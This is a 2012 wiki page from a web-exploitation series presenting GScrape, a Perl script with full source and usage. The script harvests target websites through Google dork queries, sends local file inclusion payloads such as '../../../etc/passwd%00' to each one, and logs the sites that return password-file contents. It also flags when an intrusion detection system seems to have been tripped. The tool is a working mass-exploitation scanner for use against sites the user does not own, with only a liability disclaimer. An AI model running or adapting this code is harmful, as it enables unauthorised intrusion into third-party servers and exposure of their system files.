Questions about this topic? Sign up to ask in the talk tab.

GScrape

From NetSec
Revision as of 07:52, 3 January 2012 by EnriqueBlackston (Talk | contribs)

Jump to: navigation, search

Introduction

GScrape is a small perl script that uses Google's Ajax API (Google::Search in | CPAN) to find vulnerable websites.

The purpose of this script is to demonstrate that one can easily create simple tools to do tedious tasks.

Example

GScrape is a simple tool, it will look for a file specified by the user containing a list of search terms, query google with those search terms and retrieve an array of websites,

which are then tested for a Local File Inclusion vulnerability, if any are found they are logged to the output file specified by the user. 

 perl gscrape.pl -f dork.lst -o gscrape.log
RPU0j.png GScrape will not return any results unless your input file actually contains a list of search terms.

Search Terms

These are just some examples of general search terms, they are not guaranteed to find any vulnerabilities. 

 .php?*=
 inurl:index.php?page=
 inurl:include.php?*=
 index.php?include=

Please note that your search terms in the file DO NOT require "inurl:", GScrape adds it for you if it isn't there.


Source

 
#!/usr/bin/perl
 
# gscrape.pl
#
# Uses Google::Search to either iterate through a list of dorks 
# And then prints out a list of vulnerable sites.
 
use Term::ANSIColor;
use Getopt::Std;
use HTTP::Request;
use Google::Search;
use LWP::UserAgent;
 
#vars n shit
my $currentversion = "1.0";
my $useragent = LWP::UserAgent->new();
my $infile;
my $outfile;
my @url_list;
my @search_terms; #search terms and
my @dorks;        #dorks, to check if the terms have "inurl:".
 
 
 
 
##--main execution:
		&banner();
		&getOpts();
 
 
		if ($opt{f} && $opt{o} && !$opt{h}) {
		&printInfo("Trying with the following settings:");
		&printInfo( ">>Search Mode: $searchmode");
		&printInfo( ">>Output file: $outfile");
 
 
			 &printInfo( ">>Search List: $infile");
			 &search_list(); 
 
 
 
		 }
		 if (!$opt{h} && !$opt{o}){
             &printCritical("YOU MUST SPECIFY AN OUTPUT FILE!1!one!");
             &printInfo("use -h flag for help");
			 print"\n\r\nExiting..\n";
		 }
 
 
 
 
 
 
##--subroutines:.
 
 
 
#Search using a list of terms:
sub search_list(){
 
open FILE, "<", $infile or die $!;
my @search_terms = <FILE>;
my $num = @search_terms;
&printInfo("Loaded $num search terms.");
&printInfo("Fixing improper search terms [if any]");
#iterate through the search terms, checking if they have "inurl:" if not, prepend it.
for( my $int = 0; $int < $num; $int++){
	my $random = int(rand($num));
 
	if ( @search_terms[$random] !~ /inurl:/ ){  ##had to learn to use regex sooner or later..	
		push(@dorks, "inurl:".@search_terms[$random]);
		} 
	if ( @search_terms[$random] =~ /inurl:/){
		push(@dorks, @search_terms[$random]);
		}
 
 
	}
	print"\n";
&printInfo("Retrieving search results..");
 
#iterate through the google dorks (search terms, with 'inurl:'), and add them to the list of sites.
foreach(@dorks) { 
 
	 $search = Google::Search->Web( query => $_ );
	while ( my $result = $search->next ) {
		if( $result->uri =~ /\=/) { #check if results have "=" in them (ex: www.site.com/index.php?page=LOLCATS)
			push(@url_list, $result->uri); #push result into the array
			&printInfo(">>".$result->uri);
		}
	}
}
 
my @lfitest = (
    '/etc/passwd%00',
	'/etc/passwd',
    '../../../../../../../../../../../../../../../etc/passwd',
    '../../../../../../../../../../../../../../../etc/passwd%00');
 
my $lfinum = @lfitest;
 
print"\n";
&printInfo("Testing sites for vulnerabilities..");
 
 
 
#Test the sites for vulns.
 
foreach( @url_list ){
	my $index = @url_list;
	my $randint = int(rand($index));
 
		my $x = @url_list[$randint];
		$x =~ s/=.*/=/ ;
 
 
 
		for (my $i = 0; $i < $lfinum; $i++){
			if ( $x !~ /http:\/\// ){
				$x = "http://".$x;
			}
 
 
 
        my $request = $useragent->get($x.@lfitest[$i]);
        my $result = $request->content;
 
        if ($result =~ m/root:x:/i){
			&printVuln(">>> ".$x.@lfitest[$i]);
			open FILE, ">>", $outfile or die $!;
			print FILE "[VULN] >> ".$x.@lfitest[$i]."\n";
			close FILE;
			last;
		}
		if ($result =~ m/hacking/i || m/reported/i ||  m/recorded/i || m/malicious/i){
			&printCritical("> Whoops! Tripped an IDS at: ".$x." With: ".@lfitest[$i]);
		}
 
	}
}
 
}
 
 
 
 
 
 
sub banner() {
system('clear');
    print("\r+=====================================================================+
           \r|                              GScrape                                |
           \r|         ________  _________                                         |
           \r|        /  _____/ /   _____/ ________________  ______   ____         |
           \r|       /   \\  ___ \\_____  \\_/ ___\\_  __ \\__  \\ \\____ \\_/ __ \\        |
           \r|       \\    \\_\\  \\/        \\  \\___|  | \\// __ \\|  |_> >  ___/        |
           \r|        \\______  /_______  /\\___  >__|  (____  /   __/ \\___  >       |
           \r|               \\/        \\/     \\/           \\/|__|        \\/        |
           \r|                                                                     |
           \r|                                                                     |
           \r|           Uses Google AJAX API to search for vulnerabilities        |
            \r+=====================================================================+
            \r                      
             \r                       www.BlackhatAcademy.org
	     \r                               v+$currentversion 
           " );
 
           printWarning("THE END USER IS LIABLE FOR THE USE OF THIS SOFTWARE.
                         \rUSING THIS AGAINST ANY SYSTEM WITHOUT PERMISSION IS A CRIMINAL ACT
                         \rTHE AUTHOR TAKES NO RESPONSIBILITY FOR THE END-USER'S ACTIONS.\n");
 
 
 
}
 
 
sub getOpts(){
	#option modes, and args.
	my $opt_string = 'f:o:h';
        getopts( "$opt_string", \%opt );
 
        #set vars of $outfile, and $infile if they are defined.
 
 
		if ($opt{o}){
			$outfile = $opt{o};
		}
 
		if ($opt{f}){
 
			$infile = $opt{f};
			$searchmode = "list";
 
		}
 
 
 
        #Display help page if -h
        usage() if $opt{h};
 
 
 
}
#YES HELLO, THIS IS HELP PAGE.
sub usage(){
	print("
 
 
 GScrape Usage:
 
	Search using a list of search terms:
	 -f /path/to/dorks.txt
 
 
	Define output file:
	 -o results.out
 
 
 
 
Example Usages:
 
    Run a list of search terms through the scanner:
	 perl gscrape.pl -f ~/Dork.lst -o ~/result.out 
 
 
	");
}
 
 
	#HERE BE ANSICOLOR:
	# [INFO] [CRITICAL] and [WARNING] messages
 
	sub printCritical(){
		my $error = shift(@_);
 
 
     print color 'bold blue';
     print "\r[";
     print color 'red';
     print "CRITICAL";
     print color 'bold blue';
     print "]  "; 
     print color 'red';
     print color 'reset';
     print $error."\n";
 
	}
	sub printWarning(){
 
		my $error = shift(@_);
 
 
     print color 'bold blue';
     print "\r[";
     print color 'yellow';
     print "WARNING";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $error."\n";
 
	}
	sub printInfo(){
 
		my $info = shift(@_);
 
 
     print color 'bold blue';
 
     print "\r[";
     print color 'reset';
     print "INFO";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $info."\n";
 
	}
 
		sub printVuln(){
 
		my $info = shift(@_);
 
 
     print color 'bold blue';
 
     print "\r[";
     print color 'green';
     print "VULN";
     print color 'bold blue';
     print "]  "; 
     print color 'reset';
     print $info."\n";
 
	}
 



GScrape
is part of a series on

Web Exploitation

Visit the Web Exploitation Portal for complete coverage.








Retrieved from "http://nets.ec/index.php?title=GScrape&oldid=2438"